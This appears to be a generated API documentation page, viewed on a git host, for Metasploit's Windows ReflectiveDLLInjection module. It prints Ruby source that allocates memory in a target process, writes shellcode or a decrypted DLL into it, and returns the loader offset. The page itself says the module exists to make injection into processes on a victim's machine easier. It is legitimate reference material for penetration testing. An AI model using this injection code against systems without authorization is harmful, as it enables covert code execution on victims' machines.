adam/metasploit-gs
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity
Files
c3f5bd3de2d1affa01e2f6c2066c6bb0fc6413bc
metasploit-gs/api/Msf/Post/Windows/ReflectiveDLLInjection.html
T
jenkins-metasploit c3f5bd3de2 Reboot gh-pages
2026-05-08 17:08:43 +00:00

645 lines
22 KiB
HTML
Raw Blame History

This file contains ambiguous Unicode characters
This file contains Unicode characters that might be confused with other characters. If you think that this is intentional, you can safely ignore this warning. Use the Escape button to reveal them.
<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<title>
Module: Msf::Post::Windows::ReflectiveDLLInjection
&mdash; Documentation by YARD 0.9.37
</title>
<link rel="stylesheet" href="../../../css/style.css" type="text/css" />
<link rel="stylesheet" href="../../../css/common.css" type="text/css" />
<script type="text/javascript">
pathId = "Msf::Post::Windows::ReflectiveDLLInjection";
relpath = '../../../';
</script>
<script type="text/javascript" charset="utf-8" src="../../../js/jquery.js"></script>
<script type="text/javascript" charset="utf-8" src="../../../js/app.js"></script>
</head>
<body>
<div class="nav_wrap">
<iframe id="nav" src="../../../class_list.html?1"></iframe>
<div id="resizer"></div>
</div>
<div id="main" tabindex="-1">
<div id="header">
<div id="menu">
<a href="../../../_index.html">Index (R)</a> &raquo;
<span class='title'><span class='object_link'><a href="../../../Msf.html" title="Msf (module)">Msf</a></span></span> &raquo; <span class='title'><span class='object_link'><a href="../../Post.html" title="Msf::Post (class)">Post</a></span></span> &raquo; <span class='title'><span class='object_link'><a href="../Windows.html" title="Msf::Post::Windows (module)">Windows</a></span></span>
&raquo;
<span class="title">ReflectiveDLLInjection</span>
</div>
<div id="search">
<a class="full_list_link" id="class_list_link"
href="../../../class_list.html">
<svg width="24" height="24">
<rect x="0" y="4" width="24" height="4" rx="1" ry="1"></rect>
<rect x="0" y="12" width="24" height="4" rx="1" ry="1"></rect>
<rect x="0" y="20" width="24" height="4" rx="1" ry="1"></rect>
</svg>
</a>
</div>
<div class="clear"></div>
</div>
<div id="content"><h1>Module: Msf::Post::Windows::ReflectiveDLLInjection
</h1>
<div class="box_info">
<dl>
<dt>Includes:</dt>
<dd><span class='object_link'><a href="../../ReflectiveDLLLoader.html" title="Msf::ReflectiveDLLLoader (module)">ReflectiveDLLLoader</a></span></dd>
</dl>
<dl>
<dt>Included in:</dt>
<dd><span class='object_link'><a href="Process.html" title="Msf::Post::Windows::Process (module)">Process</a></span></dd>
</dl>
<dl>
<dt>Defined in:</dt>
<dd>lib/msf/core/post/windows/reflective_dll_injection.rb</dd>
</dl>
</div>
<h2>Overview</h2><div class="docstring">
<div class="discussion">
<p>This module exposes functionality which makes it easier to do Reflective DLL Injection into processes on a victims machine.</p>
</div>
</div>
<div class="tags">
</div>
<h2>
Constant Summary
<small><a href="#" class="constants_summary_toggle">collapse</a></small>
</h2>
<dl class="constants">
<dt id="PAGE_ALIGN-constant" class="">PAGE_ALIGN =
</dt>
<dd><pre class="code"><span class='int'>1024</span></pre></dd>
</dl>
<h3 class="inherited">Constants included
from <span class='object_link'><a href="../../ReflectiveDLLLoader.html" title="Msf::ReflectiveDLLLoader (module)">ReflectiveDLLLoader</a></span></h3>
<p class="inherited"><span class='object_link'><a href="../../ReflectiveDLLLoader.html#EXPORT_REFLECTIVELOADER-constant" title="Msf::ReflectiveDLLLoader::EXPORT_REFLECTIVELOADER (constant)">ReflectiveDLLLoader::EXPORT_REFLECTIVELOADER</a></span></p>
<h2>
Instance Method Summary
<small><a href="#" class="summary_toggle">collapse</a></small>
</h2>
<ul class="summary">
<li class="public ">
<span class="summary_signature">
<a href="#initialize-instance_method" title="#initialize (instance method)">#<strong>initialize</strong>(info = {}) &#x21d2; Object </a>
</span>
<span class="summary_desc"><div class='inline'></div></span>
</li>
<li class="public ">
<span class="summary_signature">
<a href="#inject_dll_data_into_process-instance_method" title="#inject_dll_data_into_process (instance method)">#<strong>inject_dll_data_into_process</strong>(process, dll_data, loader_name: &#39;ReflectiveLoader&#39;, loader_ordinal: EXPORT_REFLECTIVELOADER) &#x21d2; Array </a>
</span>
<span class="summary_desc"><div class='inline'>
<p>Inject a reflectively-injectable DLL into the given process using reflective injection.</p>
</div></span>
</li>
<li class="public ">
<span class="summary_signature">
<a href="#inject_dll_into_process-instance_method" title="#inject_dll_into_process (instance method)">#<strong>inject_dll_into_process</strong>(process, dll_path, loader_name: &#39;ReflectiveLoader&#39;, loader_ordinal: EXPORT_REFLECTIVELOADER) &#x21d2; Array </a>
</span>
<span class="summary_desc"><div class='inline'>
<p>Inject a reflectively-injectable DLL into the given process using reflective injection.</p>
</div></span>
</li>
<li class="public ">
<span class="summary_signature">
<a href="#inject_into_process-instance_method" title="#inject_into_process (instance method)">#<strong>inject_into_process</strong>(process, shellcode) &#x21d2; Integer </a>
</span>
<span class="summary_desc"><div class='inline'>
<p>Inject the given shellcode into a target process.</p>
</div></span>
</li>
</ul>
<h3 class="inherited">Methods included from <span class='object_link'><a href="../../ReflectiveDLLLoader.html" title="Msf::ReflectiveDLLLoader (module)">ReflectiveDLLLoader</a></span></h3>
<p class="inherited"><span class='object_link'><a href="../../ReflectiveDLLLoader.html#load_rdi_dll-instance_method" title="Msf::ReflectiveDLLLoader#load_rdi_dll (method)">#load_rdi_dll</a></span>, <span class='object_link'><a href="../../ReflectiveDLLLoader.html#load_rdi_dll_from_data-instance_method" title="Msf::ReflectiveDLLLoader#load_rdi_dll_from_data (method)">#load_rdi_dll_from_data</a></span></p>
<div id="instance_method_details" class="method_details_list">
<h2>Instance Method Details</h2>
<div class="method_details first">
<h3 class="signature first" id="initialize-instance_method">
#<strong>initialize</strong>(info = {}) &#x21d2; <tt>Object</tt>
</h3><table class="source_code">
<tr>
<td>
<pre class="lines">
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31</pre>
</td>
<td>
<pre class="code"><span class="info file"># File 'lib/msf/core/post/windows/reflective_dll_injection.rb', line 16</span>
<span class='kw'>def</span> <span class='id identifier rubyid_initialize'>initialize</span><span class='lparen'>(</span><span class='id identifier rubyid_info'>info</span> <span class='op'>=</span> <span class='lbrace'>{</span><span class='rbrace'>}</span><span class='rparen'>)</span>
<span class='kw'>super</span><span class='lparen'>(</span>
<span class='id identifier rubyid_update_info'>update_info</span><span class='lparen'>(</span>
<span class='id identifier rubyid_info'>info</span><span class='comma'>,</span>
<span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>Compat</span><span class='tstring_end'>&#39;</span></span> <span class='op'>=&gt;</span> <span class='lbrace'>{</span>
<span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>Meterpreter</span><span class='tstring_end'>&#39;</span></span> <span class='op'>=&gt;</span> <span class='lbrace'>{</span>
<span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>Commands</span><span class='tstring_end'>&#39;</span></span> <span class='op'>=&gt;</span> <span class='qwords_beg'>%w[</span><span class='words_sep'>
</span><span class='tstring_content'>stdapi_sys_process_memory_allocate</span><span class='words_sep'>
</span><span class='tstring_content'>stdapi_sys_process_memory_protect</span><span class='words_sep'>
</span><span class='tstring_content'>stdapi_sys_process_memory_write</span><span class='words_sep'>
</span><span class='tstring_end'>]</span></span>
<span class='rbrace'>}</span>
<span class='rbrace'>}</span>
<span class='rparen'>)</span>
<span class='rparen'>)</span>
<span class='kw'>end</span></pre>
</td>
</tr>
</table>
</div>
<div class="method_details ">
<h3 class="signature " id="inject_dll_data_into_process-instance_method">
#<strong>inject_dll_data_into_process</strong>(process, dll_data, loader_name: &#39;ReflectiveLoader&#39;, loader_ordinal: EXPORT_REFLECTIVELOADER) &#x21d2; <tt>Array</tt>
</h3><div class="docstring">
<div class="discussion">
<p>Inject a reflectively-injectable DLL into the given process using reflective injection.</p>
</div>
</div>
<div class="tags">
<p class="tag_title">Parameters:</p>
<ul class="param">
<li>
<span class='name'>process</span>
<span class='type'>(<tt><span class='object_link'><a href="../../../Rex/Post/Meterpreter/Extensions/Stdapi/Sys/Process.html" title="Rex::Post::Meterpreter::Extensions::Stdapi::Sys::Process (class)">Rex::Post::Meterpreter::Extensions::Stdapi::Sys::Process</a></span></tt>)</span>
&mdash;
<div class='inline'>
<p>The process to inject the shellcode into.</p>
</div>
</li>
<li>
<span class='name'>dll_data</span>
<span class='type'>(<tt>String</tt>)</span>
&mdash;
<div class='inline'>
<p>the DLL contents which is to be loaded and injected.</p>
</div>
</li>
</ul>
<p class="tag_title">Returns:</p>
<ul class="return">
<li>
<span class='type'>(<tt>Array</tt>)</span>
&mdash;
<div class='inline'>
<p>Tuple of allocated memory address and offset to the <code>ReflectiveLoader</code> function.</p>
</div>
</li>
</ul>
</div><table class="source_code">
<tr>
<td>
<pre class="lines">
80
81
82
83
84
85
86</pre>
</td>
<td>
<pre class="code"><span class="info file"># File 'lib/msf/core/post/windows/reflective_dll_injection.rb', line 80</span>
<span class='kw'>def</span> <span class='id identifier rubyid_inject_dll_data_into_process'>inject_dll_data_into_process</span><span class='lparen'>(</span><span class='id identifier rubyid_process'>process</span><span class='comma'>,</span> <span class='id identifier rubyid_dll_data'>dll_data</span><span class='comma'>,</span> <span class='label'>loader_name:</span> <span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>ReflectiveLoader</span><span class='tstring_end'>&#39;</span></span><span class='comma'>,</span> <span class='label'>loader_ordinal:</span> <span class='const'><span class='object_link'><a href="../../ReflectiveDLLLoader.html#EXPORT_REFLECTIVELOADER-constant" title="Msf::ReflectiveDLLLoader::EXPORT_REFLECTIVELOADER (constant)">EXPORT_REFLECTIVELOADER</a></span></span><span class='rparen'>)</span>
<span class='id identifier rubyid_decrypted_dll_data'>decrypted_dll_data</span> <span class='op'>=</span> <span class='op'>::</span><span class='const'>MetasploitPayloads</span><span class='op'>::</span><span class='const'>Crypto</span><span class='period'>.</span><span class='id identifier rubyid_decrypt'>decrypt</span><span class='lparen'>(</span><span class='label'>ciphertext:</span> <span class='id identifier rubyid_dll_data'>dll_data</span><span class='rparen'>)</span>
<span class='id identifier rubyid_offset'>offset</span> <span class='op'>=</span> <span class='id identifier rubyid_load_rdi_dll_from_data'>load_rdi_dll_from_data</span><span class='lparen'>(</span><span class='id identifier rubyid_decrypted_dll_data'>decrypted_dll_data</span><span class='comma'>,</span> <span class='label'>loader_name:</span> <span class='id identifier rubyid_loader_name'>loader_name</span><span class='comma'>,</span> <span class='label'>loader_ordinal:</span> <span class='id identifier rubyid_loader_ordinal'>loader_ordinal</span><span class='rparen'>)</span>
<span class='id identifier rubyid_dll_mem'>dll_mem</span> <span class='op'>=</span> <span class='id identifier rubyid_inject_into_process'>inject_into_process</span><span class='lparen'>(</span><span class='id identifier rubyid_process'>process</span><span class='comma'>,</span> <span class='id identifier rubyid_decrypted_dll_data'>decrypted_dll_data</span><span class='rparen'>)</span>
<span class='kw'>return</span> <span class='id identifier rubyid_dll_mem'>dll_mem</span><span class='comma'>,</span> <span class='id identifier rubyid_offset'>offset</span>
<span class='kw'>end</span></pre>
</td>
</tr>
</table>
</div>
<div class="method_details ">
<h3 class="signature " id="inject_dll_into_process-instance_method">
#<strong>inject_dll_into_process</strong>(process, dll_path, loader_name: &#39;ReflectiveLoader&#39;, loader_ordinal: EXPORT_REFLECTIVELOADER) &#x21d2; <tt>Array</tt>
</h3><div class="docstring">
<div class="discussion">
<p>Inject a reflectively-injectable DLL into the given process using reflective injection.</p>
</div>
</div>
<div class="tags">
<p class="tag_title">Parameters:</p>
<ul class="param">
<li>
<span class='name'>process</span>
<span class='type'>(<tt><span class='object_link'><a href="../../../Rex/Post/Meterpreter/Extensions/Stdapi/Sys/Process.html" title="Rex::Post::Meterpreter::Extensions::Stdapi::Sys::Process (class)">Rex::Post::Meterpreter::Extensions::Stdapi::Sys::Process</a></span></tt>)</span>
&mdash;
<div class='inline'>
<p>The process to inject the shellcode into.</p>
</div>
</li>
<li>
<span class='name'>dll_path</span>
<span class='type'>(<tt>String</tt>)</span>
&mdash;
<div class='inline'>
<p>Path to the DLL that is to be loaded and injected.</p>
</div>
</li>
</ul>
<p class="tag_title">Returns:</p>
<ul class="return">
<li>
<span class='type'>(<tt>Array</tt>)</span>
&mdash;
<div class='inline'>
<p>Tuple of allocated memory address and offset to the <code>ReflectiveLoader</code> function.</p>
</div>
</li>
</ul>
</div><table class="source_code">
<tr>
<td>
<pre class="lines">
64
65
66
67
68
69</pre>
</td>
<td>
<pre class="code"><span class="info file"># File 'lib/msf/core/post/windows/reflective_dll_injection.rb', line 64</span>
<span class='kw'>def</span> <span class='id identifier rubyid_inject_dll_into_process'>inject_dll_into_process</span><span class='lparen'>(</span><span class='id identifier rubyid_process'>process</span><span class='comma'>,</span> <span class='id identifier rubyid_dll_path'>dll_path</span><span class='comma'>,</span> <span class='label'>loader_name:</span> <span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>ReflectiveLoader</span><span class='tstring_end'>&#39;</span></span><span class='comma'>,</span> <span class='label'>loader_ordinal:</span> <span class='const'><span class='object_link'><a href="../../ReflectiveDLLLoader.html#EXPORT_REFLECTIVELOADER-constant" title="Msf::ReflectiveDLLLoader::EXPORT_REFLECTIVELOADER (constant)">EXPORT_REFLECTIVELOADER</a></span></span><span class='rparen'>)</span>
<span class='id identifier rubyid_dll'>dll</span><span class='comma'>,</span> <span class='id identifier rubyid_offset'>offset</span> <span class='op'>=</span> <span class='id identifier rubyid_load_rdi_dll'>load_rdi_dll</span><span class='lparen'>(</span><span class='id identifier rubyid_dll_path'>dll_path</span><span class='comma'>,</span> <span class='label'>loader_name:</span> <span class='id identifier rubyid_loader_name'>loader_name</span><span class='comma'>,</span> <span class='label'>loader_ordinal:</span> <span class='id identifier rubyid_loader_ordinal'>loader_ordinal</span><span class='rparen'>)</span>
<span class='id identifier rubyid_dll_mem'>dll_mem</span> <span class='op'>=</span> <span class='id identifier rubyid_inject_into_process'>inject_into_process</span><span class='lparen'>(</span><span class='id identifier rubyid_process'>process</span><span class='comma'>,</span> <span class='id identifier rubyid_dll'>dll</span><span class='rparen'>)</span>
<span class='kw'>return</span> <span class='id identifier rubyid_dll_mem'>dll_mem</span><span class='comma'>,</span> <span class='id identifier rubyid_offset'>offset</span>
<span class='kw'>end</span></pre>
</td>
</tr>
</table>
</div>
<div class="method_details ">
<h3 class="signature " id="inject_into_process-instance_method">
#<strong>inject_into_process</strong>(process, shellcode) &#x21d2; <tt>Integer</tt>
</h3><div class="docstring">
<div class="discussion">
<p>Inject the given shellcode into a target process.</p>
</div>
</div>
<div class="tags">
<p class="tag_title">Parameters:</p>
<ul class="param">
<li>
<span class='name'>process</span>
<span class='type'>(<tt><span class='object_link'><a href="../../../Rex/Post/Meterpreter/Extensions/Stdapi/Sys/Process.html" title="Rex::Post::Meterpreter::Extensions::Stdapi::Sys::Process (class)">Rex::Post::Meterpreter::Extensions::Stdapi::Sys::Process</a></span></tt>)</span>
&mdash;
<div class='inline'>
<p>The process to inject the shellcode into.</p>
</div>
</li>
<li>
<span class='name'>shellcode</span>
<span class='type'>(<tt>String</tt>)</span>
&mdash;
<div class='inline'>
<p>The shellcode to inject.</p>
</div>
</li>
</ul>
<p class="tag_title">Returns:</p>
<ul class="return">
<li>
<span class='type'>(<tt>Integer</tt>)</span>
&mdash;
<div class='inline'>
<p>Address of the shellcode in the target process's memory.</p>
</div>
</li>
</ul>
</div><table class="source_code">
<tr>
<td>
<pre class="lines">
41
42
43
44
45
46
47
48
49
50
51
52
53</pre>
</td>
<td>
<pre class="code"><span class="info file"># File 'lib/msf/core/post/windows/reflective_dll_injection.rb', line 41</span>
<span class='kw'>def</span> <span class='id identifier rubyid_inject_into_process'>inject_into_process</span><span class='lparen'>(</span><span class='id identifier rubyid_process'>process</span><span class='comma'>,</span> <span class='id identifier rubyid_shellcode'>shellcode</span><span class='rparen'>)</span>
<span class='id identifier rubyid_shellcode_size'>shellcode_size</span> <span class='op'>=</span> <span class='id identifier rubyid_shellcode'>shellcode</span><span class='period'>.</span><span class='id identifier rubyid_length'>length</span>
<span class='kw'>unless</span> <span class='id identifier rubyid_shellcode'>shellcode</span><span class='period'>.</span><span class='id identifier rubyid_length'>length</span> <span class='op'>%</span> <span class='const'><span class='object_link'><a href="#PAGE_ALIGN-constant" title="Msf::Post::Windows::ReflectiveDLLInjection::PAGE_ALIGN (constant)">PAGE_ALIGN</a></span></span> <span class='op'>==</span> <span class='int'>0</span>
<span class='id identifier rubyid_shellcode_size'>shellcode_size</span> <span class='op'>+=</span> <span class='const'><span class='object_link'><a href="#PAGE_ALIGN-constant" title="Msf::Post::Windows::ReflectiveDLLInjection::PAGE_ALIGN (constant)">PAGE_ALIGN</a></span></span> <span class='op'>-</span> <span class='lparen'>(</span><span class='id identifier rubyid_shellcode'>shellcode</span><span class='period'>.</span><span class='id identifier rubyid_length'>length</span> <span class='op'>%</span> <span class='const'><span class='object_link'><a href="#PAGE_ALIGN-constant" title="Msf::Post::Windows::ReflectiveDLLInjection::PAGE_ALIGN (constant)">PAGE_ALIGN</a></span></span><span class='rparen'>)</span>
<span class='kw'>end</span>
<span class='id identifier rubyid_shellcode_mem'>shellcode_mem</span> <span class='op'>=</span> <span class='id identifier rubyid_process'>process</span><span class='period'>.</span><span class='id identifier rubyid_memory'>memory</span><span class='period'>.</span><span class='id identifier rubyid_allocate'>allocate</span><span class='lparen'>(</span><span class='id identifier rubyid_shellcode_size'>shellcode_size</span><span class='rparen'>)</span>
<span class='id identifier rubyid_process'>process</span><span class='period'>.</span><span class='id identifier rubyid_memory'>memory</span><span class='period'>.</span><span class='id identifier rubyid_protect'>protect</span><span class='lparen'>(</span><span class='id identifier rubyid_shellcode_mem'>shellcode_mem</span><span class='rparen'>)</span>
<span class='id identifier rubyid_process'>process</span><span class='period'>.</span><span class='id identifier rubyid_memory'>memory</span><span class='period'>.</span><span class='id identifier rubyid_write'>write</span><span class='lparen'>(</span><span class='id identifier rubyid_shellcode_mem'>shellcode_mem</span><span class='comma'>,</span> <span class='id identifier rubyid_shellcode'>shellcode</span><span class='rparen'>)</span>
<span class='kw'>return</span> <span class='id identifier rubyid_shellcode_mem'>shellcode_mem</span>
<span class='kw'>end</span></pre>
</td>
</tr>
</table>
</div>
</div>
</div>
<div id="footer">
Generated on Fri May 8 17:02:37 2026 by
<a href="https://yardoc.org" title="Yay! A Ruby Documentation Tool" target="_parent">yard</a>
0.9.37 (ruby-3.1.5).
</div>
</div>
</body>
</html>
Reference in New Issue View Git Blame Copy Permalink